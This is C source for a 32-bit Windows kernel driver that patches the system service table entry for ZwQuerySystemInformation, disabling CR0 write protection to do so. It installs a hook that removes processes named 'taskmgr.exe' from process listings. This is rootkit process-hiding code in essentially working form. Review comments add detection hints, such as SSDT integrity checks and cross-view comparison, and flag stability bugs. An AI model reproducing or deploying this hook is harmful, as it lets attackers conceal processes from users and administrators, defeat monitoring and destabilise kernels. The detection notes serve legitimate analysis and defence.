#include <ntddk.h>
#include <string.h>
VOID UnloadDriver(IN PDRIVER_OBJECT DriverObject);
///////////////////Local structure definitions//////////////////////////////////////////
// Local mirror of the per-thread record that follows each process entry in a
// SystemProcessInformation buffer. In this file it exists only to give
// struct _SYSTEM_PROCESSES its trailing Threads[] member; no field of it is
// ever read here.
// NOTE(review): this is the author's reading of the undocumented 32-bit
// SYSTEM_THREAD_INFORMATION layout — verify against the target OS build.
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;      // sic — presumably meant ClientId; unused here
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};
// Local mirror of one process entry in a SystemProcessInformation buffer.
// Entries form a singly linked list inside the buffer: NextEntryDelta is the
// byte offset from this entry to the next, 0 on the last entry.
// The hook below reads and rewrites only NextEntryDelta and reads ProcessName;
// every other member is carried solely to keep those two at the right offset.
// NOTE(review): offsets are the author's reading of the undocumented 32-bit
// SYSTEM_PROCESS_INFORMATION layout — verify against the target OS build.
struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;            // byte offset to next entry, 0 = last
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;      // image name; compared case-insensitively by the hook
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
struct _SYSTEM_THREADS Threads[1];   // pre-C99 "trailing array" idiom; ThreadCount entries follow
};
///////////////Native API declarations///////////////////////////////////////
// Prototype of the kernel's ZwQuerySystemInformation stub, declared locally
// rather than taken from a header. DriverEntry/UnloadDriver use its address
// only to read the service index embedded in the stub; it is never called.
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
// Function-pointer type for the original service routine saved out of the
// service table (see OldZwQuerySystemInformation).
typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
// Replacement routine that DriverEntry installs into the service table slot
// of ZwQuerySystemInformation. Same signature as the original so the system
// call dispatcher can invoke it unchanged.
NTSTATUS MyZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
/////////////////Layout of the ntoskrnl.exe service descriptor table////////////////////////////////////////////////
// One entry of the kernel's service descriptor table (the SSDT header).
// The inline asm in DriverEntry/UnloadDriver touches only ServiceTableBase,
// which it reaches as the dword at offset 0 (`mov esi, [eax]`); the other
// members are present only so that offset is right.
typedef struct _ServiceDescriptorEntry {
unsigned int *ServiceTableBase;          // array of service routine addresses, indexed by service number
unsigned int *ServiceCounterTableBase;   // unused here
unsigned int NumberOfServices;           // unused here — the asm never bounds-checks the index against it
unsigned char *ParamTableBase;           // unused here
}ServiceDescriptorTableEntry, *PServiceDescriptorTableEntry;
////////////////////Global variables used by the driver///////////////
// Exported ntoskrnl symbol, declared here as a *pointer* to the table. The asm
// in DriverEntry reads `dword ptr [KeServiceDescriptorTable]` and then
// dereferences the result to get ServiceTableBase, i.e. it relies on the
// linker binding this data import to a pointer-sized slot.
// NOTE(review): confirm that binding for the toolchain in use; the symbol
// itself is only exported by 32-bit kernels, which matches the x86-only asm.
extern PServiceDescriptorTableEntry KeServiceDescriptorTable;
// Original service routine address read out of the table before it is
// overwritten; MyZwQuerySystemInformation forwards to it, UnloadDriver puts it back.
ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;
// CR0 value saved by the asm before bit 16 (WP) is cleared, restored afterwards.
unsigned long OldCr0;
// Initialised in DriverEntry; LinkDeviceNameString is also used by UnloadDriver.
UNICODE_STRING DeviceNameString;
UNICODE_STRING LinkDeviceNameString;
// Driver entry point. Creates a control device and its Win32-visible link,
// then overwrites the service table slot of ZwQuerySystemInformation with
// MyZwQuerySystemInformation so every process-list query passes through it.
//
// Observable artefacts of this routine, for anyone auditing a system: the
// device \Device\HideProcess with link \DosDevices\HideProcess, and a service
// table entry that no longer points into the ntoskrnl image — exactly what an
// SSDT integrity check compares against.
//
// Parameters: DriverObject — this driver; RegistryPath — unused.
// Returns: the NTSTATUS of device/link creation; the table patch itself has no
// failure path (the inline asm either succeeds or faults).
// NOTE(review): the asm is 32-bit MSVC `_asm` using 32-bit registers, so this
// file builds and runs only on x86 kernels. `cli` only masks interrupts on the
// executing CPU; nothing here serialises the table write against other CPUs.
NTSTATUS DriverEntry (IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
NTSTATUS status;
PDEVICE_OBJECT deviceObject;
RtlInitUnicodeString( &DeviceNameString, L"\\Device\\HideProcess" );
RtlInitUnicodeString( &LinkDeviceNameString,L"\\DosDevices\\HideProcess" );
KdPrint(("DriverEntry Enter............................\n"));
// No device extension (size 0). The device type/characteristics chosen here
// (disk file system, secure open) do not affect the hook below.
status = IoCreateDevice(
DriverObject,
0,
&DeviceNameString,
FILE_DEVICE_DISK_FILE_SYSTEM,
FILE_DEVICE_SECURE_OPEN,
FALSE,
& deviceObject );
if (!NT_SUCCESS( status ))
{
KdPrint(( "DriverEntry: Error creating control device object, status=%08x\n", status ));
return status;
}
status = IoCreateSymbolicLink(
(PUNICODE_STRING) &LinkDeviceNameString,
(PUNICODE_STRING) &DeviceNameString
);
if (!NT_SUCCESS(status))
{
// Undo the device creation; the hook has not been installed yet.
IoDeleteDevice(deviceObject);
return status;
}
DriverObject->DriverUnload=UnloadDriver;
//////////////////////Hook ZwQuerySystemInformation/////////////////////////////////////////////////
// Step 1: save CR0 and clear bit 16 (WP, mask 0fffeffffh) so that supervisor
// writes to read-only pages — the service table — are no longer blocked.
_asm{
cli;
mov eax,cr0
mov OldCr0,eax
and eax,0fffeffffh
mov cr0,eax
}
// Step 2: locate and overwrite the table slot.
//   ecx = address of the ZwQuerySystemInformation stub
//   edx = dword at stub+1 — the immediate of the stub's leading `mov eax, imm32`,
//         i.e. the service index (relies on that stub encoding)
//   eax = KeServiceDescriptorTable (read as a pointer, see the extern above)
//   esi = ServiceTableBase (dword at offset 0 of the table)
//   OldZwQuerySystemInformation = ServiceTableBase[index]   (saved original)
//   ServiceTableBase[index]     = &MyZwQuerySystemInformation
// The index is never checked against NumberOfServices.
_asm{
mov ecx, dword ptr [ZwQuerySystemInformation];
mov edx, [ecx+1];
mov eax, dword ptr [KeServiceDescriptorTable];
mov esi, [eax];
mov edx, [esi+edx*4];
mov dword ptr [OldZwQuerySystemInformation], edx
mov ecx, [ecx+1]
mov eax, [eax]
mov dword ptr [eax+ecx*4], offset MyZwQuerySystemInformation;
}
// Step 3: restore CR0 (re-enabling WP) and interrupts.
_asm
{
mov eax,OldCr0
mov cr0,eax
sti;
}
KdPrint(("Hook ZwQuerySystemInformation'status is Succeessfully "));
// `status` still holds the result of IoCreateSymbolicLink (success here).
return status ;
}
// Driver unload routine: writes the saved original routine back into the
// service table slot of ZwQuerySystemInformation, then removes the symbolic
// link and the control device created in DriverEntry.
//
// NOTE(review): nothing here waits for threads that may still be executing
// inside MyZwQuerySystemInformation when the image is released; the unhook
// sequence has the same x86-only / single-CPU `cli` caveats as the hook.
VOID UnloadDriver(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING uniWin32NameString;   // unused
UNICODE_STRING LinkNameString;       // unused — the global LinkDeviceNameString is used below
PDEVICE_OBJECT deviceObject;
//////////////////////UnHook ZwQuerySystemInformation/////////////////////////////////////////////////
// Save CR0 and clear bit 16 (WP) so the table page can be written (mirrors DriverEntry).
_asm{
cli;
mov eax,cr0
mov OldCr0,eax
and eax,0fffeffffh
mov cr0,eax
}
// Recompute the slot exactly as DriverEntry did (stub+1 gives the service
// index, [KeServiceDescriptorTable] -> ServiceTableBase) and store the saved
// original address back into ServiceTableBase[index].
_asm{
mov ecx, dword ptr [ZwQuerySystemInformation];
mov edx, [ecx+1];
mov eax, dword ptr [KeServiceDescriptorTable];
mov esi, [eax];
mov ebx, dword ptr [OldZwQuerySystemInformation];
mov [esi+edx*4],ebx;
}
// Restore CR0 and interrupts.
_asm
{
mov eax,OldCr0
mov cr0,eax
sti;
}
KdPrint(("UnHookZwQuerySystemInformation'status is Succeessfully................... "));
deviceObject= DriverObject->DeviceObject;
IoDeleteSymbolicLink(&LinkDeviceNameString);
// NOTE(review): this ASSERT dereferences deviceObject before the NULL check
// on the next line; in a checked build a NULL device object faults here.
ASSERT(!deviceObject->AttachedDevice);
if ( deviceObject != NULL )
{
IoDeleteDevice( deviceObject );
}
}
// Replacement service routine installed in place of ZwQuerySystemInformation.
// Forwards every call to the saved original; when the call succeeded and the
// class is 5 (SystemProcessInformation), walks the returned process list and
// unlinks entries whose ProcessName equals "taskmgr.exe" (case-insensitive)
// by folding their NextEntryDelta into the previous entry.
//
// Parameters and return value are passed straight through from/to the original.
//
// NOTE(review): because this runs in the service table slot, SystemInformation
// is the caller's (user-mode) buffer; it is read and written here with no
// ProbeForWrite/__try, so an invalid or concurrently modified buffer faults the
// kernel. Detection angle: the list this routine returns disagrees with other
// process enumeration sources, which is what cross-view comparisons look for.
NTSTATUS MyZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS rc;
UNICODE_STRING process_name;
RtlInitUnicodeString(&process_name, L"taskmgr.exe");
// Let the original routine fill the buffer first.
rc = (OldZwQuerySystemInformation) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength);
if(NT_SUCCESS(rc))
{
if(5 == SystemInformationClass)
{
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
// Skip the first entry outright (it is never compared) if it has a successor.
// `(char *)curr += ...` is an MSVC cast-as-lvalue extension, not standard C.
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
while(curr)
{
// Third argument 1 == CaseInSensitive.
if (RtlEqualUnicodeString(&process_name, &curr->ProcessName, 1))
{
KdPrint(("hide process'name taskmgr.exe"));
if(prev)
{
// Bridge over curr: prev now points to curr's successor (or becomes last).
if(curr->NextEntryDelta)
{
prev->NextEntryDelta += curr->NextEntryDelta;
}
else
{
prev->NextEntryDelta = 0;
}
}
else
{
// No predecessor recorded: only the local parameter copy is adjusted
// here, the buffer contents are left as the original wrote them.
if(curr->NextEntryDelta)
{
(char *)SystemInformation += curr->NextEntryDelta;
}
else
{
SystemInformation = NULL;
}
}
// Advance past the matched entry without making it the new prev.
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
else
{
curr = NULL;
break;
}
}
// Non-matching entry: remember it as prev and move on.
if(curr != NULL)
{
prev = curr;
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
else curr = NULL;
}
}
}
}
KdPrint(("HookZwQuerySystemInformation'status is Succeessfully................... "));
return rc;
}